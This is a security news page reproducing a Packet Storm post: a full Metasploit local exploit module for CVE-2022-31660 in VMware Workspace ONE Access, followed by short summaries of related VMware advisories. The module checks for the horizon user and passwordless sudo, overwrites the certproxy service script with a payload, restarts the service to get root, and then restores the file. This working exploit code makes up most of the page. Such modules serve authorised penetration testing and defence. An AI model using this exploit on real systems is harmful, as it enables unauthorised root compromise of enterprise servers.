Security
Headlines
HeadlinesLatestCVEs

Headline

VMware Workspace ONE Access Privilege Escalation

VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.

Packet Storm
#vulnerability#linux#git#vmware#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Post::File  include Msf::Post::Unix  TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'VMware Workspace ONE Access CVE-2022-31660',          'Description' => %q{            VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges            to those of the root user by modifying a file and then restarting the vmware-certproxy service which            invokes it. The service control is permitted via the sudo configuration without a password.          },          'License' => MSF_LICENSE,          'Author' => [            'Spencer McIntyre'          ],          'Platform' => [ 'linux', 'unix' ],          'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],          'SessionTypes' => ['shell', 'meterpreter'],          'Targets' => [            [ 'Automatic', {} ],          ],          'DefaultOptions' => {            'PrependFork' => true,            'MeterpreterTryToFork' => true          },          'Privileged' => true,          'DefaultTarget' => 0,          'References' => [            [ 'CVE', '2022-31660' ],            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]          ],          'DisclosureDate' => '2022-08-02',          'Notes' => {            # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service            # is disabled by default though.            'Stability' => [CRASH_SERVICE_DOWN],            'Reliability' => [REPEATABLE_SESSION],            'SideEffects' => [ARTIFACTS_ON_DISK]          }        }      )    )  end  def certproxy_service    # this script's location depends on the version, so find it.    return @certproxy_service if @certproxy_service    @certproxy_service = [      '/usr/local/horizon/scripts/certproxyService.sh',      '/opt/vmware/certproxy/bin/certproxyService.sh'    ].find { |path| file?(path) }    vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service    @certproxy_service  end  def sudo(arguments)    cmd_exec("sudo --non-interactive #{arguments}")  end  def check    unless whoami == 'horizon'      return CheckCode::Safe('Not running as the horizon user.')    end    token = Rex::Text.rand_text_alpha(10)    unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)      return CheckCode::Safe('Cannot invoke the service control script with sudo.')    end    unless writable?(TARGET_FILE)      return CheckCode::Safe('Cannot write to the service file.')    end    CheckCode::Appears  end  def exploit    # backup the original permissions and contents    print_status('Backing up the original file...')    @backup = {      stat: stat(TARGET_FILE),      contents: read_file(TARGET_FILE)    }    if payload.arch.first == ARCH_CMD      payload_data = "#!/bin/bash\n#{payload.encoded}"    else      payload_data = generate_payload_exe    end    upload_and_chmodx(TARGET_FILE, payload_data)    print_status('Triggering the payload...')    sudo("--background #{certproxy_service} restart")  end  def cleanup    return unless @backup    print_status('Restoring file contents...')    file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it    write_file(TARGET_FILE, @backup[:contents])    print_status('Restoring file permissions...')    chmod(TARGET_FILE, @backup[:stat].mode & 0o777)  endend

Related news

CVE-2022-31658: VMSA-2022-0021

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution.

VMWare Urges Users to Patch Critical Authentication Bypass Bug

Vulnerability—for which a proof-of-concept is forthcoming—is one of a string of flaws the company fixed that could lead to an attack chain.

Update now! VMWare patches critical vulnerabilities in several products

In a critical security advisory VMWare patches multiple RCE and EoP vulnerabilities in several affected products. The post Update now! VMWare patches critical vulnerabilities in several products appeared first on Malwarebytes Labs.

Update now! VMWare patches critical vulnerabilities in several products

Categories: Exploits and vulnerabilities Tags: CVSS Tags: rce Tags: vmware In a critical security advisory VMWare patches multiple RCE and EoP vulnerabilities in several affected products. (Read more...) The post Update now! VMWare patches critical vulnerabilities in several products appeared first on Malwarebytes Labs.

VMware Releases Patches for Several New Flaws Affecting Multiple Products

Virtualization services provider VMware on Tuesday shipped updates to address 10 security flaws affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions. The issues tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8) affect the VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution